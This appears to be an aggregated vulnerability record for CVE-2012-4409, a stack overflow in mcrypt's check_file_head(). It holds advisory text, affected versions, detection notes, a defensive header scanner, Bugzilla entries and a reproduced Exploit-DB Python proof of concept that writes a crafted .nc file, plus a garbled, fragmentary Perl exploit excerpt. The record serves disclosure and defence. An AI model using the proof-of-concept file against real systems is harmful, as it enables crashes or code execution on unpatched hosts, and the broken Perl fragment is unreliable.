CVE-2012-4409
Published: 2012-11-21
Priority: P3 · 44 · medium · CVSS 2.0 base score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Exploit: public PoC available (see the Exploit-DB entries below)
EPSS: 15.02% (96.3th percentile)
Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier allows user-assisted remote attackers to execute arbitrary code via an encrypted file with a crafted header containing long salt data that is not properly handled during decryption.
Affected (10 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | mcrypt | < mcrypt 2.6.8-1.1 (bookworm) | mcrypt 2.6.8-1.1 (bookworm) |
| mcrypt | mcrypt | <= 2.6.8 | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
Detection & IOCs (extracted from sources)
Header bytes of the crafted .nc file: `\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00`
- The exploit triggers a stack-based buffer overflow in check_file_head() when mcrypt decrypts a .nc file with a crafted header containing an oversized salt field (105+ bytes). Monitor for `mcrypt -d` invocations on .nc files, especially those with unusually large salt data in the header.
- The malicious .nc file header begins with the magic bytes `\x00\x6d\x03` followed by crafted algorithm/mode strings and a salt length byte (0x69 = 105) with 105 'A' bytes of padding. Scan .nc files for headers where the salt length field exceeds expected bounds.
- If FORTIFY_SOURCE is enabled (e.g., on Fedora/RHEL builds), exploitation is reduced to a crash. Monitor for abnormal mcrypt process terminations (SIGABRT/SIGSEGV) as an indicator of attempted exploitation.
- The vulnerable function is check_file_head() in extra.c. Audit or instrument this function for salt buffer length checks when processing encrypted file headers.
- The vulnerability affects mcrypt 2.6.8 and earlier (the command-line tool, not the library). The attack requires user interaction — the victim must attempt to decrypt the crafted .nc file.
- Debian fixed this in package version 2.6.8-1.1 across bookworm, bullseye, forky, sid, and trixie. Fedora/EPEL fixed it in mcrypt-2.6.8-9. Ensure patched versions are deployed.
- A separate but related CVE (CVE-2012-4527) covers a stack overflow triggered by overly long filenames (~128 bytes) passed to mcrypt, distinct from the crafted .nc header salt overflow of CVE-2012-4409.
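The scan suggested above ("headers where the salt length field exceeds expected bounds") can be implemented as a small header parser. The following Python is an added defensive example, not code from this record, from the Exploit-DB PoC, or from the mcrypt project: it parses the .nc header layout inferred from the IOC bytes quoted above (magic, flags, algorithm, key size, mode, key mode, salt-length byte, salt) and classifies a file as ok, oversized-salt, or malformed. The `MAX_SALT` and `MAX_NAME` limits, the function names, and the benign sample header are assumptions; the crafted sample reproduces the header bytes quoted in this record.

```python
"""Defensive scanner for mcrypt .nc headers (CVE-2012-4409).

Added example, not code from this record, the Exploit-DB PoC, or the mcrypt
project.  The header layout is inferred from the IOC bytes quoted above:
  magic       3 bytes  (\\x00\\x6d\\x03)
  flags       1 byte
  algorithm   NUL-terminated string
  key size    2 bytes, little-endian
  mode        NUL-terminated string
  key mode    NUL-terminated string
  salt length 1 byte, followed by that many salt bytes
MAX_SALT and MAX_NAME are assumed sanity limits, not values from the record.
"""
import struct

MAGIC = b"\x00\x6d\x03"
MAX_SALT = 64   # assumed ceiling; the PoC declares 105, which the record says overflows check_file_head()
MAX_NAME = 32   # assumed ceiling for the three NUL-terminated name fields


class HeaderError(ValueError):
    """Raised when the bytes do not parse as the layout described above."""


def _read_cstring(buf, off):
    """Read a NUL-terminated ASCII field starting at off; return (text, next offset)."""
    end = buf.find(b"\x00", off)
    if end < 0 or end - off > MAX_NAME:
        raise HeaderError("unterminated or oversized string field at offset %d" % off)
    return buf[off:end].decode("ascii", "replace"), end + 1


def parse_nc_header(data):
    """Parse the fixed-order header fields; raise HeaderError on malformed input."""
    if not data.startswith(MAGIC):
        raise HeaderError("bad magic")
    off = len(MAGIC)
    if len(data) < off + 1:
        raise HeaderError("truncated flags")
    flags = data[off]
    off += 1
    algorithm, off = _read_cstring(data, off)
    if len(data) < off + 2:
        raise HeaderError("truncated key size")
    keysize = struct.unpack_from("<H", data, off)[0]
    off += 2
    mode, off = _read_cstring(data, off)
    keymode, off = _read_cstring(data, off)
    if len(data) < off + 1:
        raise HeaderError("truncated salt length")
    salt_len = data[off]
    off += 1
    salt = data[off:off + salt_len]
    return {
        "flags": flags,
        "algorithm": algorithm,
        "keysize": keysize,
        "mode": mode,
        "keymode": keymode,
        "salt_len": salt_len,
        "salt_truncated": len(salt) < salt_len,
    }


def check_header(data, max_salt=MAX_SALT):
    """Classify header bytes as 'ok', 'oversized-salt' or 'malformed'."""
    try:
        hdr = parse_nc_header(data)
    except HeaderError:
        return "malformed"
    if hdr["salt_truncated"]:
        return "malformed"
    if hdr["salt_len"] > max_salt:
        return "oversized-salt"
    return "ok"


def scan_file(path, max_salt=MAX_SALT):
    """Read enough of a file for the header and classify it."""
    with open(path, "rb") as fh:
        return check_header(fh.read(512), max_salt)


# Constructed samples.  CRAFTED reproduces the IOC bytes quoted in this record
# (magic, flags 0x40, "serpent", key size 32, "cbc", "mcrypt-sha1") followed by
# the PoC's salt-length byte 0x69 (105) and 105 bytes of 'A'.
CRAFTED = (b"\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62"
           b"\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00"
           + bytes([105]) + b"A" * 105 + b"\x00" * 3)
# BENIGN is a constructed header with the same fields and a 16-byte salt.
BENIGN = (b"\x00\x6d\x03\x40serpent\x00\x20\x00cbc\x00mcrypt-sha1\x00"
          + bytes([16]) + b"S" * 16)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print("%s: %s" % (path, scan_file(path)))
    if not sys.argv[1:]:
        print("crafted sample:", check_header(CRAFTED))
        print("benign sample:", check_header(BENIGN))
```

Run it with one or more .nc paths to get a verdict per file; with no arguments it classifies the two embedded samples. A "malformed" verdict only means the bytes do not match the inferred layout, so treat it as a triage signal rather than proof of a crafted file, and tune `MAX_SALT` to the salt sizes your own mcrypt-produced files actually carry.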
CVSS provenance
- nvd: CVSS 2.0 6.8 MEDIUM (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- osv: 6.8 MEDIUM
- vendor_debian: 6.8 MEDIUM
GHSA
GHSA-x2pj-g5q5-wh2x (ghsa_unreviewed · 2022-05-17 · MEDIUM · CWE-119): Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier (same description as above).
OSV
CVE-2012-4409 (osv · 2012-11-21 · MEDIUM · CVSS 6.8): Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier (same description as above).
Debian
CVE-2012-4409 (vendor_debian · 2012 · MEDIUM · CVSS 6.8): mcrypt - Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier (same description as above).
Scope: local
bookworm: resolved (fixed in 2.6.8-1.1)
bullseye: resolved (fixed in 2.6.8-1.1)
forky: resolved (fixed in 2.6.8-1.1)
sid: resolved (fixed in 2.6.8-1.1)
trixie: resolved (fixed in 2.6.8-1.1)
No detection rules found.
Exploit-DB
mcrypt 2.6.8 - Stack Buffer Overflow (PoC) (exploitdb · 2012-11-26)

```python
#!/usr/bin/env python
# mcrypt <= 2.6.8 stack-based buffer overflow poc
# http://mcrypt.sourceforge.net/
# (the command line tool, not the library)
#
# date: 2012-09-04
# exploit author: _ishikawa
# tested on: ubuntu 12.04.1
# tech: it overflows in check_file_head() when decrypting .nc files with too long salt data
#
# shout-outs to all cryptoparty people
import sys
sprawl = 105
gibson = "\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62"
gibson += "\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00"
gibson += chr(sprawl)
gibson += ("A" * sprawl)
gibson += (chr(0) * 3)
try:
    count0 = open("cyberpunk.nc", "wb")
    count0.write(gibson)
    count0.close()
except IOError:
    print "file error"
    sys.exit(1)
print "now run mcrypt -d
```
Exploit-DB
mcrypt 2.5.8 - Local Stack Overflow (exploitdb · 2012-11-26 · MEDIUM · CVSS 6.8)

```perl
#!/usr/bin/perl
# Title : mcrypt ', $filename);
print F $file;
close F;
}
sub build_file {
# magic
$file .= "\x00m\x03";
# flags
$file .= pack('C', 1 0xfe);
return $payload;
}
```
Bugzilla
CVE-2012-4527 mcrypt: stack-based buffer overflow by encryption / decryption of overly long file names (bugzilla · 2012-10-18 · MEDIUM · CVSS 6.8)
Created attachment 629285
patch to fix the buffer overflow
Description of problem:
A buffer overflow in mcrypt version 2.6.8 and earlier due to long filenames. If a user were tricked into attempting to encrypt/decrypt specially crafted long filename(s), this flaw would cause a stack-based buffer overflow that could potentially lead to arbitrary code execution.
Note that this is caught by FORTIFY_SOURCE, which renders this to being a crash-only bug on Fedora.
There are currently no upstream patches for this flaw.
Version-Release number of selected component (if applicable):
mcrypt-2.6.8-9.el6 (possibly others too).
How reproducible:
Run mcrypt with ~128 byte long file names.
Discussion:
Bugzilla
CVE-2012-4409 mcrypt: buffer overflow when processing encrypted file headers (bugzilla · 2012-09-06 · MEDIUM · CVSS 6.8)
A buffer overflow was reported [1],[2] in mcrypt version 2.6.8 and earlier due to a boundary error in the processing of an encrypted file (via the check_file_head() function in src/extra.c). If a user were tricked into attempting to decrypt a specially-crafted .nc encrypted file, this flaw would cause a stack-based buffer overflow that could potentially lead to arbitrary code execution.
Note that this is caught by FORTIFY_SOURCE, which renders this to being a crash-only bug on Fedora.
There are currently no upstream patches for this flaw.
[1] https://secunia.com/advisories/50507/
[2] https://bugs.gentoo.org/show_bug.cgi?id=434112
Discussion:
Created mcrypt tracking bugs for this issue
Affects: fedora-all [bu
References
- http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086519.html
- http://lists.fedoraproject.org/pipermail/package-announce/2012-September/087542.html
- http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088281.html
- http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html
- http://secunia.com/advisories/50507
- http://secunia.com/advisories/51010
- http://www.openwall.com/lists/oss-security/2012/09/06/4
- http://www.securitytracker.com/id?1027532
- https://bugzilla.redhat.com/show_bug.cgi?id=855029